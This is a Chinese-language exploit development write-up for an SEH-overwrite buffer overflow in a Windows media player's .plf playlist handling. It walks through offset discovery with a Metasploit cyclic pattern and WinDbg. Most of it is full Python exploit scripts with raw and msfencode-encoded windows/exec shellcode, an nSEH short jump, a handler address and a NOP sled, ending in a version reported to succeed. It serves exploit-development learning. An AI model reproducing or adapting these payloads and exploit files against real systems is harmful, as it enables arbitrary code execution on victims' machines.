daniel@daniel-mint ~/msf/metasploit-framework/tools $ ruby pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

生成定位pattern

根据pattern查找位置

0:000> db poi(fs:0)
0012f2c8 32 41 75 33 41 75 34 41-75 35 41 75 36 41 75 37 2Au3Au4Au5Au6Au7
0012f2d8 41 75 38 41 75 39 41 76-30 41 76 31 41 76 32 41 Au8Au9Av0Av1Av2A
0012f2e8 76 33 41 76 34 41 76 35-41 76 36 41 76 37 41 76 v3Av4Av5Av6Av7Av
0012f2f8 38 41 76 39 41 77 30 41-77 31 41 77 32 41 77 33 8Av9Aw0Aw1Aw2Aw3
0012f308 41 77 34 41 77 35 41 77-36 41 77 37 41 77 38 41 Aw4Aw5Aw6Aw7Aw8A
0012f318 77 39 41 78 30 41 78 31-41 78 32 41 78 33 41 78 w9Ax0Ax1Ax2Ax3Ax
0012f328 34 41 78 35 41 78 36 41-78 37 41 78 38 41 78 39 4Ax5Ax6Ax7Ax8Ax9
0012f338 41 79 30 41 79 31 41 79-32 41 79 33 41 79 34 41 Ay0Ay1Ay2Ay3Ay4A

  

Prelude> zip [1..100] ['a'..'z']
[(1,'a'),(2,'b'),(3,'c'),(4,'d'),(5,'e'),(6,'f'),(7,'g'),(8,'h'),(9,'i'),(10,'j'),(11,'k'),(12,'l'),(13,'m'),(14,'n'),(15,'o'),(16,'p'),(17,'q'),(18,'r'),(19,'s'),(20,'t'),(21,'u'),(22,'v'),(23,'w'),(24,'x'),(25,'y'),(26,'z')]

  

因此 Au3-Aa0 = [u-a]*10 + [3-0] = (21-1)*10 + 3 = 203,即 Au3 是第 203 个三元组(从 0 开始计数,Aa0 为第 0 个)。

所以 Au3 的首字节 "A" 位于 203*3 = 609 偏移处(0 基计数);而覆盖到 SEH 记录中的 4 个字节 "2Au3" 从前一个三元组 Au2 的末字节 "2" 开始,即 0 基偏移 608。

或者

At9-Aa0 = [t - a + 1] * 10 = 200组,占据了600个字节,

Au0Au1Au2Au3

Prelude> zip [601..700] ['A','u','0','A','u','1','A','u','2','A','u','3']
[(601,'A'),(602,'u'),(603,'0'),(604,'A'),(605,'u'),(606,'1'),(607,'A'),(608,'u'),(609,'2'),(610,'A'),(611,'u'),(612,'3')]

  

因此按 1 计数,"2Au3" 占据第 609-612 这四个字节;换算成 0 基偏移就是 608-611。所以下面的脚本先填充 608 个 "A",紧接着的 4 个字节正好落在 SEH 记录上。

参考:http://www.fuzzysecurity.com/tutorials/expDev/3.html

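filename = "evil.plf"

# Size of the crafted file.  The cyclic pattern used to locate the offset was
# 2000 bytes (pattern_create.rb 2000), so the test file keeps the same size.
total_len = 2000


def build_buffer(total_len=2000):
    """Build the SEH-overwrite test buffer and return it as bytes.

    Layout (0-based offsets):
      0..607    "A" padding: 608 bytes, so the next 4 bytes land where the
                pattern bytes "2Au3" were found in the SEH record
      608..611  "B": overwrites the first dword of the exception registration
                record (next-SEH pointer), shown as 42424242 in the debugger
      612..615  "C": overwrites the second dword (handler pointer), 43434343
      616..     "D" filler up to total_len

    total_len: total file size in bytes; must be >= 616.
    """
    buf = b"A" * 608 + b"B" * 4 + b"C" * 4
    # Pad from the measured length instead of hand-subtracting sizes: the
    # original "2000 - 608 - 8 - 8" counted the 8 bytes of B+C twice and
    # produced a 1992-byte file.
    buf += b"D" * (total_len - len(buf))
    return buf


if __name__ == "__main__":
    # Binary mode: text mode would apply newline/encoding translation on some
    # platforms and Python versions, breaking the byte-exact layout.
    with open(filename, "wb") as textfile:
        textfile.write(build_buffer(total_len))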

  

0:000> dd poi(fs:0)
0012f2c8 42424242 43434343 44444444 44444444
0012f2d8 44444444 44444444 44444444 44444444
0012f2e8 44444444 44444444 44444444 44444444
0012f2f8 44444444 44444444 44444444 44444444
0012f308 44444444 44444444 44444444 44444444
0012f318 44444444 44444444 44444444 44444444
0012f328 44444444 44444444 44444444 44444444
0012f338 44444444 44444444 44444444 44444444

  

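filename = "evil1.plf"

# Raw (unencoded) msfpayload windows/exec CMD=calc.exe shellcode, 200 bytes.
# NOTE: it contains \x00 bytes (and \x0a / \x0d); the write-up records that
# this version did NOT work because the input is cut off at the first \x00.
# Kept byte-for-byte for the record; the encoded version is used later.
SHELLCODE = (
    b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"
    b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    b"\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
    b"\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"
    b"\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"
    b"\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"
    b"\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"
    b"\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"
    b"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
    b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"
    b"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
    b"\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"
    b"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"
    b"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
    b"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
    b"\x2e\x65\x78\x65\x00"
)

# Size of the crafted file (same as the 2000-byte locating pattern).
total_len = 2000


def build_buffer(total_len=2000):
    """Build the (non-working) SEH exploit buffer and return it as bytes.

    Layout (0-based offsets):
      0..607    "A" padding up to the SEH record
      608..611  next-SEH: \xeb\x06 = jmp short over the following 6 bytes
                (2 NOPs + the 4-byte handler address), landing on the shellcode
      612..615  handler address 0x0047f7b6, little-endian. It contains a \x00
                byte, which on its own already breaks this version.
      616..815  raw shellcode (200 bytes, also contains \x00)
      816..     "D" filler up to total_len

    total_len: total file size in bytes; must be >= 816.
    """
    nseh = b"\xeb\x06\x90\x90"
    seh = b"\xb6\xf7\x47\x00"
    buf = b"A" * 608 + nseh + seh + SHELLCODE
    # Pad from the measured length; the original "2000 - 608 - 8 - 8 - 200"
    # subtracted the nSEH/SEH 8 bytes twice and yielded a 1992-byte file.
    buf += b"D" * (total_len - len(buf))
    return buf


if __name__ == "__main__":
    # Binary mode is required here: the payload has bytes > 0x7f, which a
    # text-mode write would re-encode on Python 3.  (The original listing also
    # had this statement fused onto the end of the padding line.)
    with open(filename, "wb") as textfile:
        textfile.write(build_buffer(total_len))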

  

这种方式并没有 exploit 成功,原因是 shellcode 中不能出现 \x00:文件内容会在 \x00 处被当作字符串截断,后面的字节根本到不了缓冲区。而 msfpayload 直接生成的原始 payload 里含有 \x00(以及 \x0a、\x0d),无法直接使用;此外上面覆盖 SEH 处理函数指针用的地址 0x0047f7b6(\xb6\xf7\x47\x00)本身就带有一个 \x00。

因此需要用 msfencode 对 payload 进行编码(是编码,不是加密),并用 -b 指定要排除的坏字符 '\x00\x0d\x0a\x1a':

daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x00\x0d\x0a\x1a' -t python -e x86/call4_dword_xor
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1
[*] x86/call4_dword_xor succeeded with size 224 (iteration=1)
buf = ""
buf += "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xdc\x84\x22\x40\x83\xee\xfc\xe2\xf4\x20\x6c"
buf += "\xab\x40\xdc\x84\x42\xc9\x39\xb5\xf0\x24\x57\xd6\x12"
buf += "\xcb\x8e\x88\xa9\x12\xc8\x0f\x50\x68\xd3\x33\x68\x66"
buf += "\xed\x7b\x13\x80\x70\xb8\x43\x3c\xde\xa8\x02\x81\x13"
buf += "\x89\x23\x87\x3e\x74\x70\x17\x57\xd6\x32\xcb\x9e\xb8"
buf += "\x23\x90\x57\xc4\x5a\xc5\x1c\xf0\x68\x41\x0c\xd4\xa9"
buf += "\x08\xc4\x0f\x7a\x60\xdd\x57\xc1\x7c\x95\x0f\x16\xcb"
buf += "\xdd\x52\x13\xbf\xed\x44\x8e\x81\x13\x89\x23\x87\xe4"
buf += "\x64\x57\xb4\xdf\xf9\xda\x7b\xa1\xa0\x57\xa2\x84\x0f"
buf += "\x7a\x64\xdd\x57\x44\xcb\xd0\xcf\xa9\x18\xc0\x85\xf1"
buf += "\xcb\xd8\x0f\x23\x90\x55\xc0\x06\x64\x87\xdf\x43\x19"
buf += "\x86\xd5\xdd\xa0\x84\xdb\x78\xcb\xce\x6f\xa4\x1d\xb6"
buf += "\x85\xaf\xc5\x65\x84\x22\x40\x8c\xec\x13\xcb\xb3\x03"
buf += "\xdd\x95\x67\x74\x97\xe2\x8a\xec\x84\xd5\x61\x19\xdd"
buf += "\x95\xe0\x82\x5e\x4a\x5c\x7f\xc2\x35\xd9\x3f\x65\x53"
buf += "\xae\xeb\x48\x40\x8f\x7b\xf7\x23\xbd\xe8\x41\x6e\xb9"
buf += "\xfc\x47\x40"

  

然后写入shellcode

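filename = "evil1.plf"

# msfpayload windows/exec CMD=calc.exe, encoded with
# msfencode -b '\x00\x0d\x0a\x1a' -e x86/call4_dword_xor: 224 bytes, free of
# the listed bad characters.
SHELLCODE = (
    b"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81"
    b"\x76\x0e\xdc\x84\x22\x40\x83\xee\xfc\xe2\xf4\x20\x6c"
    b"\xab\x40\xdc\x84\x42\xc9\x39\xb5\xf0\x24\x57\xd6\x12"
    b"\xcb\x8e\x88\xa9\x12\xc8\x0f\x50\x68\xd3\x33\x68\x66"
    b"\xed\x7b\x13\x80\x70\xb8\x43\x3c\xde\xa8\x02\x81\x13"
    b"\x89\x23\x87\x3e\x74\x70\x17\x57\xd6\x32\xcb\x9e\xb8"
    b"\x23\x90\x57\xc4\x5a\xc5\x1c\xf0\x68\x41\x0c\xd4\xa9"
    b"\x08\xc4\x0f\x7a\x60\xdd\x57\xc1\x7c\x95\x0f\x16\xcb"
    b"\xdd\x52\x13\xbf\xed\x44\x8e\x81\x13\x89\x23\x87\xe4"
    b"\x64\x57\xb4\xdf\xf9\xda\x7b\xa1\xa0\x57\xa2\x84\x0f"
    b"\x7a\x64\xdd\x57\x44\xcb\xd0\xcf\xa9\x18\xc0\x85\xf1"
    b"\xcb\xd8\x0f\x23\x90\x55\xc0\x06\x64\x87\xdf\x43\x19"
    b"\x86\xd5\xdd\xa0\x84\xdb\x78\xcb\xce\x6f\xa4\x1d\xb6"
    b"\x85\xaf\xc5\x65\x84\x22\x40\x8c\xec\x13\xcb\xb3\x03"
    b"\xdd\x95\x67\x74\x97\xe2\x8a\xec\x84\xd5\x61\x19\xdd"
    b"\x95\xe0\x82\x5e\x4a\x5c\x7f\xc2\x35\xd9\x3f\x65\x53"
    b"\xae\xeb\x48\x40\x8f\x7b\xf7\x23\xbd\xe8\x41\x6e\xb9"
    b"\xfc\x47\x40"
)

# Size of the crafted file (same as the 2000-byte locating pattern).
total_len = 2000


def build_buffer(total_len=2000):
    """Build the working SEH exploit buffer and return it as bytes.

    Layout (0-based offsets):
      0..607    "A" padding up to the SEH record
      608..611  next-SEH: \xeb\x06 = jmp short over the following 6 bytes
                (2 NOPs + the 4-byte handler address), landing on the NOP sled
      612..615  handler address 0x64037aed, little-endian; no bad bytes.
                Presumably a pop/pop/ret gadget as in the referenced tutorial;
                not verifiable from this write-up.
      616..635  20-byte NOP sled
      636..859  encoded shellcode (224 bytes)
      860..     "D" filler up to total_len

    total_len: total file size in bytes; must be >= 860.
    """
    nseh = b"\xeb\x06\x90\x90"
    seh = b"\xed\x7a\x03\x64"
    sled = b"\x90" * 20
    buf = b"A" * 608 + nseh + seh + sled + SHELLCODE
    # Pad from the measured length; the original "2000 - 608 - 8 - 8 - 224 - 20"
    # subtracted the nSEH/SEH 8 bytes twice and yielded a 1992-byte file.
    buf += b"D" * (total_len - len(buf))
    return buf


if __name__ == "__main__":
    # Binary mode is required: the payload has bytes > 0x7f, which a text-mode
    # write would re-encode on Python 3.  (The original listing also had this
    # statement fused onto the end of the padding line.)
    with open(filename, "wb") as textfile:
        textfile.write(build_buffer(total_len))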

  

用下面的平台测试,exploit 成功(此平台列表来自所参考的教程;本文前面生成 pattern 和 payload 的命令实际是在 Linux Mint 上运行的)。

Exploit Development: Backtrack 5
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download
